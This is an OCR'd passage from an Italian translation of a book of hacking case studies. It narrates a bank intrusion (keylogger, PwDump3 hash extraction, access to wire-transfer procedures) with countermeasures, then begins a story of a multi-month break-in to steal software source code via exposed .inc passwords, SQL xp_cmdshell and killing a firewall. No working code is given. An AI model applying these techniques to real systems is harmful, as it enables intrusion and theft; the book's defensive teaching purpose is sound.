l'applicazione server Citrix. Installato il Keylogger, Gabriel atte- 
se finché non entrò un amministratore, e gli soffiò la password. 

Armato delle password, fece il colpo grosso: una serie com- 
pleta di manuali di istruzioni su come usare le applicazioni più 
importanti sull’As/400. Aveva il potere di fare le stesse operazio- 
ni di un impiegato della banca: trasferire denaro, vedere e modi- 
ficare informazioni sui conti dei clienti, monitorare l’attività dei 
bancomat sul territorio nazionale, controllare prestiti e bonifici, 
accedere al sistema Equifax® per il controllo del credito, addirit- 


5 Equifax è un'impresa americana specializzata in informatica applicata al- 
la gestione e al controllo dei flussi di denaro, del debito e del credito. [N.d.7.] 
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tura visionare i documenti dei tribunali sugli scoperti. Scoprì che 
dal sito della banca poteva anche accedere alla banca dati della 
Motorizzazione civile di quello stato. 

Poi voleva ottenere gli hash delle password dal controller del 
dominio principale? che verifica l'autenticità di tutti i log-in sul 
dominio. Il programma che adottò fu PwDump3, che estrae tut- 
ti gli hash delle password da una parte protetta del registro di si- 
stema. Ottenne i privilegi da amministratore sulla macchina lo- 
cale, quindi aggiunse uno script per eseguire PwDump3 sotto for- 
ma di alias nella cartella di avvio, mascherandolo come qualco- 
sa di innocuo. (In realtà avrebbe potuto evitare questo passaggio 
e semplicemente ricavare dal file di registro le ultime dieci pass- 
word memorizzate nella cache, ma questi account sarebbero sta- 
ti con ogni probabilità dei normali utenti.) 

Gabrielaspettava che un amministratore del dominio entrasse 
nel computer prescelto. Il programma agisce sostanzialmente 
come una mina da campo che entra in funzione quando viene 
sollecitata, in questo caso il log-in di un amministratore di siste- 
ma. Quando l'amministratore entra, gli hash delle password ven- 
gono estratti e salvati di nascosto in un file. L'applicazione 
PwDump3 viene fatta girare direttamente dalla cartella di avvio. 
“A volte ci vogliono giorni [prima che un amministratore entri],” 
dice, “ma vale la pena aspettare.” 

Non appena l’ignaro amministratore del dominio entrò, 
estrasse senza rendersene conto gli hash delle password e li salvò 
in un file nascosto. Gabriel ritornò sulla scena del delitto per ot- 
tenere gli hash e lanciò un programma per craccare le password, 
usando il computer più potente a sua disposizione. 

In una macchina come quella, una password semplice come 
“password” può essere craccata in meno di un secondo. Le pass- 
word di Windows sembrano essere particolarmente facili, men- 
tre una password complicata che fa uso di simboli speciali può 
richiedere molto più tempo. “Una volta ne trovai una per cui mi 
ci volle un mese intero per decrittarla,” ricorda Gabriel avvilito. 
La password dell’amministratore della banca era di sole quattro 
lettere minuscole. Fu craccata più velocemente di quanto impie- 
gate a leggere questo paragrafo. 


A qualcuno interessa un conto in banca in Svizzera? 
Alcune delle informazioni trovate da Gabriel fanno apparire 


il resto del raccolto come del loglio. 
Gabriel trovò il modo di entrare nella parte più sensibile di 


é Primary Domain Controller (Pdc). [N.d.T] 
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tutte le operazioni bancarie: il processo per i trasferimenti di de- 
naro. Trovò le schermate del menu per iniziare il procedimento. 
Scoprì anche il modulo online usato da un gruppo ristretto di di- 
pendenti autorizzati: questi hanno il potere di gestire le transa- 
zioni per ritirare fondi dal conto di un cliente e trasferirli elet- 
tronicamente a un’altra istituzione finanziaria, che potrebbe an- 
che essere dall'altra parte del mondo (in Svizzera, per esempio). 
Ma un form in bianco non serve a nulla se non si sa come 
compilarlo. Neanche questo risultò essere un problema. Nel ma- 
nuale di istruzioni che aveva trovato in precedenza, uno dei ca- 
pitoli si rivelò particolarmente interessante. Gabriel non ebbe bi- 
sogno di leggerlo fino in fondo per trovare quello che cercava. 


20.1.2 Inserire / Aggiornare bonifici bancari 
Menu: Bonifici bancari 


Opzione: Inserire / Aggiornare bonifici bancari 

Questa opzione viene usata per inserire trasferimenti non automa- 
tici e per selezionare bonifici automatici da inserire ed effettuare. I 
trasferimenti non automatici sono per i clienti che fanno bonifici 
occasionali o per chi non è cliente e vuole fare un bonifico. Trami- 
te questa opzione possono anche essere gestiti i bonifici in entrata 
dopo che sono stati ricevuti. Quando questa opzione viene selezio- 
nata apparirà la seguente schermata: 


Wire Transfers 

Wire Transfers 11:35:08 

Outgoing 

Type options, press Enter. 

2=Change 4=Delete 5=Display Position to... 
Opt From account To beneficiary Amount 
F3=Exit F&=Add F9=Incoming F12=Previous 


All'inizio quando viene scelta questa opzione non apparirà nella li- 
sta alcun bonifico. Per aggiungerne, premere F6=Add e apparirà la 
seguente schermata. 


Un intero capitolo spiegava passo dopo passo la procedura 
dettagliata per inviare un bonifico da una banca, trasferire de- 
naro dal conto di una persona a un’altra istituzione finanziaria. 
Gabriel adesso sapeva tutto quello di cui c'era bisogno per fare 
un trasferimento di denaro. Aveva le chiavi del castello. 


Epilogo 


A onore di Gabriel va riconosciuto che, nonostante tutte le pos- 
sibilità di accesso che aveva al sistema della banca e l'enorme quan- 
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tità di potere non autorizzato a sua disposizione, non toccò nean- 

che un centesimo. Non aveva nessun interesse a rubare denaro o 

a sabotare i dati della banca, anche se effettivamente lo solleticò. 
l’idea di migliorare il tasso creditizio di un paio di amici. Come è 

normale per uno studente iscritto a un programma sulla sicurez- 

za alla locale università, Gabriel fece un'attenta valutazione delle 

debolezze delle misure di protezione della banca: 


Sul server trovai molti documenti sulla sicurezza fisica, ma nessu- 
no faceva riferimento agli hacker. Trovai qualcosa sui consulenti per 
la sicurezza che ingaggiano ogni anno per controllare i server, ma 
ciò non basta per una banca. Fanno un buon lavoro quando si trat- 
ta della sicurezza fisica della banca, ma non abbastanza per quella 
informatica. 


Riflessioni 


La banca in Estonia era un bersaglio facile. Juhan trovò il 
baco osservando il codice sorgente delle pagine del sito web del- 
la banca. Il codice utilizzava un elemento nascosto di un form 
che conteneva il file di un modello di formulario, che veniva ca- 
ricato dallo script Cgi e poi mostrato agli utenti nei loro brow- 
ser. Gabriel cambiò la variabile nascosta in modo che puntasse 
al file delle password contenuto sul server e voila il file delle pass- 
word gli apparve nel browser. Sorprendentemente il file non era 
stato oscurato, così ebbe accesso a tutte le password crittate, che 
poi decrittò. 

L'hack della banca del Sud ci mostra un altro esempio della 
necessità di una “difesa in profondità”. In questo caso la rete del- 
la banca risultò essere piatta, cioè senza alcuna protezione di ri- 
lievo oltrepassato il server Citrix. Una volta che uno qualunque 
dei sistemi sulla rete venne compromesso, l’autore dell'attacco 
poté collegarsi a qualunque altro sistema sulla rete. Un modello 
di difesa in profondità avrebbe potuto impedire a Gabriel di ot- 
tenere l’accesso all’As/400. 

I responsabili della sicurezza informatica della banca si sen- 
tivano tranquilli, al riparo, per colpa di un falso senso di sicu- 
rezza per aver commissionato un'analisi, che può aver alzato sen- 
za un reale motivo il livello di fiducia nei loro atteggiamenti. An- 
che se richiedere una consulenza o un'analisi sulla sicurezza è un 
passo importante per misurare la capacità di resistenza a un at- 
tacco, un processo ancora più cruciale è la gestione corretta del- 
la rete e di tutti i suoi sistemi. 
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Contromisure 


Il sito della banca avrebbe dovuto richiedere che tutti gli svi- 
luppatori di applicazioni web si attenessero a pratiche fonda- 
mentali di programmazione sicura, oppure richiedessero un'a- 
nalisi di ogni codice messo in produzione. L'abitudine migliore 
è limitare la quantità di informazione inserita dall'utente che 
viene passata a uno script sul lato server. Utilizzare nomi di 
file e altre costanti con una solida codificazione, se non lo ren- 
de evidente, aumenta comunque le garanzie di sicurezza del- 
l'applicazione. 

Un monitoraggio distratto della rete e una sicurezza debole 
delle password sul server Citrix esposto, sono stati gli errori prin- 
cipali in questo caso. Se fossero stati evitati, avrebbero impedito 
a Gabriel di aggirarsi nella rete della banca, installare software 
per registrare i tasti digitati dagli utenti, seguire passo passo al- 
tri utenti autorizzati e installare software che funzionavano co- 
me cavalli di Troia. L'hacker ha scritto un piccolo script, posi- 
zionandolo poi nella cartella di avvio dell’amministratore, in mo- 
do che quando questi fosse entrato sarebbe partito in modalità 
invisibile il programma PwDump3. Certo, Gabriel aveva già i di- 
ritti di amministratore. L'hacker stava aspettando che un ammi- 
nistratore entrasse in modo da potersi appropriare dei suoi pri- 
vilegi ed estrarre automaticamente gli hash delle password dal 
controller primario del dominio. Lo script nascosto viene spesso 
chiamato Trojan o trapdoor.” 

Tra le contromisure da adottare suggeriamo le seguenti: 


e Controllate tutti gli account dall'ultima volta che è stata de- 
finita la password, le password installate sui sistemi o sugli ac- 
count delle applicazioni non assegnati al personale, i diritti di 
amministratore non autorizzati, i diritti di gruppo non autoriz- 
zati, e il momento dell’ultimo accesso autorizzato. Questi con- 
trolli possono portare a identificare un'infrazione della sicurez- 
za. Cercate le password inserite fuori dall'orario di ufficio perché 
l'hacker potrebbe non rendersi conto che, cambiando le password, 
sta lasciando un percorso tracciabile. 

e Limitate agli orari d’ufficio gli accessi interattivi. 

e Abilitate il monitoraggio degli accessi e delle sconnessioni 


7 In termini matematici, la funzione di trapdoor (letteralmente, porta a scom- 
parsa) è una funzione facile da calcolare in una direzione, ma il cui calcolo è ri- 
tenuto difficile nella direzione opposta (o inversa), senza un'informazione spe- 
ciale chiamata per l'appunto “trapdoor”. Le funzioni di trapdoor sono molto in 
uso in crittografia, e possono essere paragonate al libretto di istruzioni per as- 
semblare un motore di cui si possiedono i singoli componenti. 
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su tutti i sistemi accessibili dall'esterno via wireless, connessio- 
ne telefonica, Internet o Extranet. 

e Impiegate software come SpyCop (disponibile a http: 
Ilwww.spycop.com) per rilevare strumenti non autorizzati di re- 
gistrazione della tastiera. 

e State attenti a installare gli aggiornamenti dei software per 
la sicurezza. In alcuni ambienti, è consigliabile scaricare auto- 
maticamente gli ultimi aggiornamenti. Microsoft insiste molto 
nell'incoraggiare i clienti a configurare in questo senso i propri 
computer. 

e Controllate la presenza di software per il controllo remoto 
come WinVNC, TightVNC, Damware e così via, sui sistemi ac- 
| cessibili dall'esterno. Questi programmi, anche se possono esse- 

re utilizzati legittimamente, possono anche dare la possibilità a 
chi attacca di monitorare e sorvegliare sessioni di lavoro auten- 
ticate dalla consolle del sistema. 

e Esaminate attentamente tutti gli accessi che usano Windows 
Terminal Services o Citrix Metaframe. La maggior parte degli au- 
tori di un attacco tende a scegliere questi servizi per controllare i 
programmi e ridurre così la possibilità di essere individuati. 


Conclusioni 


Gli hack raccontati in questo capitolo sono semplici, basati 
sullo sfruttamento della scarsa sicurezza delle password nelle im- 
prese e degli script Cgi vulnerabili. Nonostante vi siano molte per- 
sone — anche gli esperti di sicurezza informatica - che tendono a 
immaginare gli hackeraggi come qualcosa di simile a un attacco 
strategico in stile Ocean's Eleven, la triste verità è che la maggior 
parte di questi attacchi non è né ingegnosa né intelligente. Van- 
no a buon fine, invece, perché una porzione considerevole delle 
reti delle imprese non è adeguatamente protetta. 

Inoltre, i responsabili dello sviluppo e della messa in produ- 
zione di questi sistemi commettono dei semplici errori di confi- 
gurazione o delle sviste di programmazione che creano le op- 
portunità di accesso per i migliaia di hacker che bussano quoti- 
dianamente alla porta principale. 

Se le due istituzioni finanziarie descritte in questo capitolo 
danno una qualche idea di come la maggior parte delle banche . 
nel mondo protegge al momento i dati e il denaro dei clienti, al- 
lora forse potremmo decidere tutti di nascondere i nostri soldi in 
una scatola di scarpe sotto il letto. 
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8. 
La vostra proprietà intellettuale non è al sicuro 


Se in un modo non funzionava, semplicemente 
ne provavo un altro perché sapevo che ce n'era 
uno che avrebbe funzionato. Ce n'è sempre uno 
che funziona. Si tratta solo di scoprire quale. 


Erik 


Qual è la risorsa di maggior valore per un'azienda? Non sono 
le macchine, non sono gli uffici o la fabbrica, non è nemmeno quel- 
lo che recitava un classico cliché imprenditoriale ormai in disuso: 
“Il nostro personale è la nostra risorsa di maggior valore”. 

La realtà dei fatti è che ognuna di queste risorse può essere 
rimpiazzata. Certo, forse non così facilmente, non senza batta- 
glie, ma moltissime imprese sono sopravvissute dopo che il pro- 
prio stabilimento era bruciato in un rogo o dopo che alcuni di- 
pendenti chiave avevano deciso di andarsene. Sopravvivere alla 
perdita della proprietà intellettuale, invece, è tutto un altro paio 
di maniche. Se qualcuno ruba i vostri progetti, la vostra lista di 
clienti, i piani per i nuovi prodotti o i dati di ricerca e sviluppo, 
il colpo sarebbe tale da mandare al tappeto la vostra impresa. 

E non è tutto, perché se qualcuno ruba un migliaio di merci 
dal vostro magazzino o una tonnellata di titanio dal vostro sta- 
bilimento o cento computer dai vostri uffici, voi ve ne rendereste 
immediatamente conto. Se qualcuno ruba elettronicamente la 
vostra proprietà intellettuale, quello che sta effettivamente ru- 
bando sono delle copie e voi non ve ne renderete conto se non 
molto più tardi (se mai accadrà), quando il danno è fatto e ne sta- 
te già subendo le conseguenze. 

Quindi forse considererete preoccupante la notizia che tutti 
i giorni ci sono degli hacker che rubano dei beni intellettuali, e 
spesso da ditte non meno attente alla sicurezza della vostra, co- 
me suggeriscono i due esempi di questo capitolo. 

I due protagonisti delle storie che seguono appartengono a 
quella razza particolare cui ci si riferisce con il termine “cracker”, 
che indica quegli hacker che craccano software facendo reverse 
engineering! delle applicazioni commerciali, o rubando il codi- 


1 È il processo di dissezionamento di uno strumento (sia esso un apparec- 
chio elettronico o un software) per analizzarne il funzionamento, di solito allo 
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ce sorgente di questi programmi o rubando il codice che genera 
le licenze del software in modo da poterlo usare gratuitamente e 
alla fine distribuirlo attraverso un labirinto di siti clandestini di 
cracking (il cracker non va confuso con il “cracker” come pro- 
gramma per la decodifica delle password crittate). 

Di solito, ci sono tre motivazioni per cui un cracker insegue 
un prodotto specifico: 


e Per ottenere un software che lo interessa particolarmente e 
che vuole esaminare da vicino. 

© Per affrontare la sfida e vedere se può dimostrare di essere 
superiore a un degno avversario (di solito lo sviluppatore), pro- 
prio come chi tenta di battere con l’intelligenza il proprio avver- 
sario a scacchi, a bridge o a poker. 

e Per pubblicare il software e renderlo disponibile all’interno 
di un mondo elettronico sotterraneo in cui ci si occupa di diffon- 
dere gratuitamente software di valore. I cracker non sono inte- 
ressati semplicemente al software in sé, ma anche al codice usa- 
to per generare il codice di attivazione della licenza. 


Entrambi i personaggi di queste storie compromettono i pro- 
duttori dei software prescelti per rubare il codice sorgente e diffon- 
dere tra i gruppi di cracker una patch o un generatore di pass- 
word che permetta in sostanza l’uso gratuito di tale software. Di- 
verse persone usano così le proprie abilità di hacker e le imprese 
di software non hanno idea di quanto vengano colpite duramente. 

I cracker si aggirano in un mondo oscuro e ben protetto in 
cui la moneta di scambio del regno è il software rubato: un fur- 
to di proprietà intellettuale su una scala talmente vasta da esse- 
re preoccupante. L'ultimo, affascinante, atto di questa storia vie- 
ne raccontato in dettaglio verso la fine del capitolo, nella sezio- 
ne “Condivisione. Il mondo del cracker”. 

(Le vicende raccontate in questo capitolo potranno risultare 
piuttosto ardue in vari punti per il lettore medio.) 


L'hack di due anni 


Erik è un consulente per la sicurezza poco più che trentenne. 
“Quando riferisco una vulnerabilità, mi sento spesso dire: ‘È una 
sciocchezza. Dov'è il problema? Cosa mai potrebbe provocare?” 
La sua storia dimostra una verità ovvia, normalmente ignorata: 
non sono solo i grandi errori che vi metteranno al tappeto. 


scopo di riprodurre uno strumento o un software che fanno le stesse cose ma sen- 
za copiare nulla dall'originale. Si veda anche il primo capitolo. [N.d.T.] 
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Capire il racconto che segue potrà sembrare uno sforzo so- 
vrumano per chi non ha una conoscenza approfondita delle tec- 
niche utilizzate dagli hacker. E tuttavia l'aspetto affascinante di 
questo resoconto è che dimostra la perseveranza di molti hacker. 
Gli eventi narrati, accaduti di recente, rivelano che Erik è, come 
molti altri in queste pagine, un hacker etico durante il giorno, 
quando aiuta le imprese a proteggere i propri beni intellettuali, 
mentre di notte viene attratto dal brivido dell’hacking contro 
ignari bersagli. 

Erik appartiene a quel genere speciale di hacker che dedica- 
no tutta la propria attenzione all’intrusione in un determinato 
luogo, e continuano a dedicarcisi finché non ci riescono... anche 
quando ci vogliono mesi o anni. 


Comincia la ricerca 


Alcuni anni fa Erik, insieme con alcuni amici hacker cono- 
sciuti in Rete, aveva cominciato a raccogliere vari tipi di softwa- 
re per server ed era arrivato al punto di “possedere il codice sor- 
gente” di tutti i principali prodotti della categoria... con una so- 
la eccezione. “Me ne mancava solo uno,” spiega, “e non so bene 
perché, ma semplicemente lo volevo.” Capisco perfettamente que- 
sto atteggiamento. Erik era a caccia di un trofeo e la sua ambi- 
zione cresceva quanto più il trofeo era di valore. 

L'ultimo software che mancava a Erik per completare la col- 
lezione si rivelò una sfida più complicata del previsto. “Ci sono 
siti in cui voglio entrare, che per una serie di ragioni, risultano 
quasi inviolabili,” spiega semplicemente. Anche in questo caso 
capisco perfettamente quello che dice. 

Cominciò nel solito modo, con “una scansione delle porte di 
un web server, che è probabilmente la prima cosa che guardo 
«quando cerco di forzarne uno. Ma di solito si trovano più punti 
deboli e invece lì a una prima occhiata non trovai nulla”. È nor- 
male all’inizio di un attacco, sondare il bersaglio superficialmente; 
si evita così di attivare allarmi o essere notati da un amministra- 
tore, tramite i dati dei collegamenti archiviati nei log. Soprattut- 
to oggi che molte imprese usano dei sistemi di allarme-intrusio- 
ne che rilevano un Port Scanning e altri tipi di scansioni usati co- 
munemente dagli hacker. 

Secondo Erik “sono poche le porte che controllo che posso- 
no essere dei bersagli interessanti”. Scansionò uno dopo l’altro 
una serie di numeri di porte usate dal web server, dai terminal 
service, dal server Microsoft Sql, dalla Virtual Private Network 
(Vpn) della Microsoft, dal NetBIOS, dal server di posta (Smtp) e 
da altri. 
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Su un server Windows la porta 1723 (citata nel capitolo 7) di 
norma è usata da un protocollo conosciuto come “tunnel da pun- 
to a punto”, che è l’implementazione della Microsoft delle co- 
municazioni via Vpn e utilizza una forma di autenticazione pro- 
pria di Windows. Erik ha scoperto che sondare la porta 1723 “mi 
dà un'idea di che tipo di ruolo viene svolto dal server” e, inoltre, 
“a volte puoi anche indovinare o forzare le password”. 

In questa fase non si preoccupa nemmeno di cercare di na- 
scondere la propria identità perché “è talmente alto il numero di 
scansioni di porte che [un'azienda] riceve ogni giorno che nes- 
suno ci fa nemmeno caso. Una scansione su centomila al giorno 
non vuol dire nulla”. 

(La valutazione di Erik del basso rischio di essere intercetta- 
ti e magari anche identificati è basata sulla sua considerazione 
azzardata che le sue scansioni di porte verranno sepolte nel “ru 
more” prodotto da Internet. È vero, gli amministratori di rete ddl 
l'impresa bersaglio potrebbero essere troppo carichi di lavoro o 
troppo pigri per esaminare i log, ma esiste sempre la possibilità 
di imbattersi in una persona zelante ed essere beccati. È un ri- 
schio che gli hacker più cauti non sono disposti a correre.) 

Nonostante il rischio, in questo caso la scansione delle por- 
te non rivelò niente di interessante. Allora, usando un software 
scritto di persona che funzionava sostanzialmente come uno 
scanner di script Cgi, trovò un file di registro degli accessi ge- 
nerato dal “server WS_Ftp” che conteneva, fra le altre cose, una 
lista di nomi di file caricati sul server. Era simile a qualunque 
altro file di log Ftp, dice Erik, “salvo il fatto che il log era stato 
salvato in ogni cartella in cui erano stati uploadati dei file”, co- 
sì quando era presente un file dall’aspetto interessante elencato 
nel log, voleva dire che si trovava proprio lì e che non bisogna- 
va andare a caccia... 

Erik analizzò il log Ftp e trovò i nomi dei file che erano stati 
caricati da poco nella cartella “/include”, usata normalmente per 
salvare i file di tipo “.inc”, funzioni comuni di programmazione 
che provengono da altri moduli principali del codice sorgente. 
Sotto Windows 2000 questi file non vengono protetti automati- 
camente. Dopo aver ricontrollato la lista dei file nel log, Erik usò 
il browser per vedere il codice sorgente di alcuni file particolari 
che pensava potessero contenere informazioni di valore. Nello 
specifico, guardò i file che potevano avere le password di un ser- 
ver con un database di backend. E alla fine fece centro. 

“A quel punto,” disse Erik, “avevo già fatto probabilmente die- 
ci richieste al server. Sai, ancora niente di speciale nei log.” No- 
nostante la scoperta delle password del database lo elettrizzasse, 
si rese presto conto che non c'era nessun database su quella mac- 
china. 
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Ma da lì in poi le cose iniziarono a farsi “interessanti”: 


Non avevo trovato nulla su quel server, ma avevo uno strumento 

scritto da me che indovina i nomi degli host basandosi su una lista 

di nomi comuni - come gateway, backup, test e così via — oltre al no- 

me del dominio. Passa in rassegna una lista di nomi comuni di 

host per identificare eventuali nomi che esistono in quel dominio. 

La gente è assai prevedibile [nella scelta dei nomi degli host], così 

diventa piuttosto facile trovare i server. 

Individuare i server fu abbastanza facile, ma continuava a 
non portarlo da nessuna parte. Poi all'improvviso gli venne in 
mente: l'azienda non era negli Stati Uniti. Così “utilizzai l'esten- 
sione di quel paese e riprovai con diversi host che avevo trovato 
con il mio software di scansione”. Per esempio per un'azienda 
giapponese sarebbe: 


nomehost.nomeazienda.com.jp 


Arrivò così a scoprire un server di backup del sito web e del- 
la posta. Vi entrò con le password che aveva trovato nei file sor- 
gente “include” (.inc). La password per il server Microsoft Sql 
funzionava con l’identità di default dell’amministratore (“sa”). 
Era ora in grado di eseguire comandi attraverso un procedimento 
standard di sistema (xp_cmdshell) che gli consentiva di dirige- 
re le operazioni dalla shell sotto qualunque utente il server Sql 
stesse girando, di solito un utente con dei privilegi. Tombola! Ciò 
gli diede un accesso completo al sistema del server web e della 
posta. 

Erik si mise immediatamente a rovistare nelle cartelle cer- 
cando delle copie di backup del codice sorgente e altre cosette. Il 
suo obiettivo principale era impadronirsi del codice proprietario 
usato per generare il codice della licenza dei clienti, chiamato co- 
munemente “key generator” o “key gen”. II primo punto all’ordi- 
ne del giorno era raccogliere più informazioni possibili sul siste- 
ma e sui suoi utenti. Per questo Erik usò un foglio di calcolo Ex- 
cel per registrare tutte le informazioni interessanti che trovava, 
come password, indirizzi Ip, nomi degli host, quali servizi erano 
disponibili attraverso quali porte e così via. 

Sondò anche le parti nascoste del sistema operativo, che lau- 
tore di un attacco amatoriale generalmente ignora, come per 
esempio i segreti del Lsa (Autorità di sicurezza locale), dove si 
conservano le password dei vari servizi, la memoria temporanea 
contenente gli hash delle password degli ultimi utenti entrati nel- 
la macchina, i nomi e le password degli account di connessione 
ai Servizi di accesso remoto (Ras), le password delle postazioni 
di lavoro usate per l’accesso al dominio e altro ancora. Diede 
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un'occhiata anche all’area di archiviazione protetta in cui Inter- 
net Explorer e Outlook Express salvano le password.? 

Il passo successivo fu quello di estrarre gli hash delle pass- 
word per craccarli e recuperare le password. Poiché il server era 
un controller del dominio di backup, un server di posta e un ser- 
ver secondario del nome di dominio (Dns), Erik riuscì ad acce- 
dere a tutti i dati sulle risorse Dns (compresi fra le altre cose i no- 
mi degli host e i relativi indirizzi Ip) aprendo il pannello di ge- 
stione dei Dns contenente l’intera lista dei nomi degli host e di 
dominio usati dall’azienda: 


A quel punto avevo una lista di tutti i loro host e non feci altro che 
recuperare le password qua e là, saltando da un sistema all’altro. 


Questo “salto della pozzanghera” fu possibile grazie al fatto 
di aver craccato precedentemente le password sul web server di 
backup dopo aver approfittato della password Microsoft Sql di 
cui era entrato in possesso. 

Ancora non sapeva a quali server corrispondevano le mac- 
chine per lo sviluppo dell'applicazione che ospitavano il codice 
sorgente del prodotto e il codice di gestione delle licenze. Alla ri- 
cerca di qualche indizio, esaminò attentamente la posta e i dati 
di accesso via web per identificare qualunque attività ricorrente 
puntasse alle caselle in questione. Una volta raccolto un elenco 
di nuovi indirizzi Ip dai log che gli sembravano più interessanti, 
il suo obiettivo sarebbero diventati questi computer. A quel pun- 
to il Sacro Graal era la postazione di lavoro di uno sviluppatore, 
visto che era probabile che uno sviluppatore qualsiasi avesse ac- 
cesso all'insieme di file che costituivano il codice sorgente del- 
l'applicazione. 

Da quel momento in poi mantenne per parecchie settimane 
un profilo basso. Oltre a raccogliere le password, non riuscì a ot- 
tenere molto altro per un paio di mesi, “insomma, di quando in 
quando scaricavo semplicemente dei frammenti di informazioni 
che pensavo potessero tornarmi utili”. 


Il computer dell’amministratore delegato 
Questa situazione si prolungò per otto mesi perché Erik “sal- 


. tando da una parte all’altra tra i server” non trovava né il codice 
sorgente, né il generatore del codice delle licenze. Ma poi arrivò la 


2 Siete interessati a vedere i vostri segreti Lsa e le aree di archiviazione pro- 
tetta? Tutto ciò di cui avete bisogno è un ottimo strumento chiamato Cain & Abel 
scaricabile da http:/www.oxid.it. 
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grande scoperta. Cominciò a guardare più da vicino l’attività del 
server di backup che aveva compromesso per primo e scoprì che 
conteneva i log di chiunque scaricasse la posta, oltre a un elenco 
dei nomi utente e degli Ip di tutti i dipendenti. Da un esame dei log 
fu in grado di recuperare l'indirizzo Ip dell’amministratore dele- 
gato. Aveva finalmente individuato un bersaglio di valore: 


Trovai finalmente il computer dell'’amministratore delegato e la co- 
sa era piuttosto interessante. Condussi per un paio di giorni una 
scansione delle porte e non ottenni nessuna risposta, ma sapevo che 
il computer esisteva. Vidi dalle intestazioni delle e-mail che usava 
un indirizzo Ip fisso, ma lui non c'era mai. Così alla fine provai a fa- 
re una scansione delle porte del suo computer, controllandone al- 
cune comuni ogni due ore per rimanere al di sotto della soglia di at- 
tenzione nel caso usasse un qualche tipo di software per rilevare le 
intrusioni. Ci provavo in vari momenti del giorno, ma limitavo il nu- 
mero delle porte a un massimo di cinque ogni ventiquattr'ore. 

Mi ci vollero alcuni giorni per trovare una porta aperta sulla sua 
macchina mentre lui era lì. Alla fine trovai aperta la 1433, che ge- 
stiva un'istanza? del server Microsoft Sql. Risultò che era il suo por- 
tatile e ci lavorava solo per un paio d’ore ogni mattina. Insomma, 
andava in ufficio, controllava l'e-mail e poi se ne andava o spegne- 
va il portatile. 


Si entra nel computer dell’amministratore delegato 


Erik aveva già recuperato tra le venti e le trenta password di 
quell’impresa. “Avevano delle buone password, ben formulate, 
ma seguivano una logica. E una volta scoperta la logica, riuscii 
facilmente a indovinare le password.” 

Erik stima che a quel punto aveva lavorato su questa storia 
per qualcosa come un anno intero, e fu allora che i suoi sforzi fu- 
rono ricompensati con un'importante scoperta. 

Stava iniziando ad avere la sensazione di capire la strategia 
di definizione delle password di tutta l'impresa, cosicché ritornò 
a forzare il computer dell'’amministratore delegato, facendo vari 
tentativi per la password. Cosa gli faceva pensare di riuscire a in- 
dovinare la password che l'amministratore delegato usava per il 
server Microsoft Sql? 


La verità è che non ne ho idea. Semplicemente è che ho questa ca- 
pacità di indovinare le password che la gente usa. Riesco anche a 


3 Nella programmazione un'istanza è un oggetto appartenente a una certa 
classe. Se una classe definisce un certa tipologia, l’uso specifico di una classe vie- 
ne chiamato istanza. In questo caso, il computer portatile sta gestendo un ac- 
cesso al server Sg]. 
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immaginare il genere di password che useranno in futuro. Ho que- 
sta sensibilità, me ne accorgo. È come se diventassi loro e predices- 
si la password che userei se fossi in loro. 


Non è sicuro se chiamarla fortuna o talento e minimizza que- 
sta capacità dicendo “sono un buon indovino”. Qualunque sia la 
spiegazione rimane il fatto che effettivamente trovò la password 
giusta, che “non era”, ricorda, “un termine del dizionario, ma 
qualcosa di più complicato”. 

Ora aveva la password che gli dava accesso al server Sql co- 
me amministratore del database. L'amministratore delegato era 
ormai “in suo possesso”. 

Si trovò di fronte un computer ben protetto, con un firewall 
e solo una porta aperta. Ma sotto altri aspetti lasciava molto a de- 
siderare. “Il suo sistema era davvero disordinatissimo. Non riu- 
scivo a trovare nulla. Voglio dire, i file erano semplicemente spar- 
si dappertutto.” Non parlando la lingua in cui la maggior parte 
delle cose erano scritte, Erik utilizzò alcuni dizionari online e un 
servizio gratuito di traduzione online chiamato Babelfish per an- 
dare a caccia di parole chiave. Anche un amico che parlava quel- 
la lingua lo aiutò. Dai log della chat riuscì a trovare altri indiriz- 
zi Ip e password. 

Dal momento che i file sul portatile erano troppo disordina- 
ti per trovare alcunché di valore, Erik cambiò approccio usando 
il comando “dir /s /od drive letter” per elencare e ordinare tutti i 
file per data, in modo da poter vedere quelli che erano stati aper- 
ti di recente e poterli esaminare una volta sconnesso. Nel corso 
di questa operazione scoprì un nome assai prevedibile di un fo- 
glio di calcolo Excel che conteneva varie password per diversi ser- 
ver e applicazioni. A partire da lì identificò un nome e una pass- 
word validi sul server Dns primario. 

Per rendere le mosse seguenti più facili - assicurandosi una 
posizione di vantaggio da cui caricare e scaricare file più facil- 
mente — Erik voleva spostare sul portatile dell’amministratore de- 
legato la sua cassetta degli attrezzi da hacker. Poteva comunica- 
re con il portatile solo attraverso la connessione al server Micro- 
soft Sql, ma era pur sempre in grado di usare lo stesso procedi- 
mento menzionato in precedenza per inviare dei comandi al si- 
stema operativo come se si trovasse di fronte a una finestra del 
Dos aperta sotto Windows. Erik scrisse un programmino per far 
sì che il protocollo di trasferimento Ftp scaricasse i suoi stru- 
menti da hacker. Dopo tre tentativi a vuoto, usò un programma 
a linee di comando chiamato “pslist”, già installato sul portatile, 
per visualizzare i processi in corso. 

Ecco il grave errore! 

Dato che sul portatile dell'amministratore delegato girava un 
firewall specifico (il Tiny Personal Firewall), ogni tentativo di usa- 
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re il Ftp faceva apparire sullo schermo una finestra di allarme, 
richiedendo il permesso per collegarsi all’esterno su Internet. For- 
tunatamente l'amministratore delegato aveva scaricato un noto 
pacchetto di strumenti per linea di comando da http://www.sy- 
sinternals.com per modificare i processi in corso. Erik usò l’uti- 
lity “pskill” per chiudere il programma del firewall in modo che 
le finestre di dialogo scomparissero prima che l'amministratore 
le vedesse. 

Ancora una volta Erik pensò che sarebbe stato meglio man- 
tenere un profilo basso per un paio di settimane nell’eventualità 
che qualcuno avesse notato la sua attività. Al suo ritorno, provò 
una tattica diversa per tentare di mettere i suoi strumenti sul por- 
tatile del manager. Elaborò uno script per recuperare molti dei 
suoi strumenti da hacker utilizzando un “oggetto di Internet Ex- 
plorer” che avrebbe ingannato il firewall facendogli credere che 
Internet Explorer stava chiedendo il permesso per connettersi a 
Internet. Praticamente tutti permettono a Internet Explorer di 
avere un accesso pieno attraverso il proprio firewall personale 
(scommetto che lo fate anche voi), ed Erik contava che il suo 
script ne avrebbe approfittato. Colpito! Il trucco funzionò e lui 
riuscì a utilizzare i suoi strumenti per iniziare a perlustrare il por- 
tatile ed estrarne informazioni. 


L'amministratore delegato nota l'intrusione 


Questo identico metodo, fa notare Erik, funzionerebbe an- 
cora oggi. 

In un'occasione successiva, mentre era collegato al portatile 
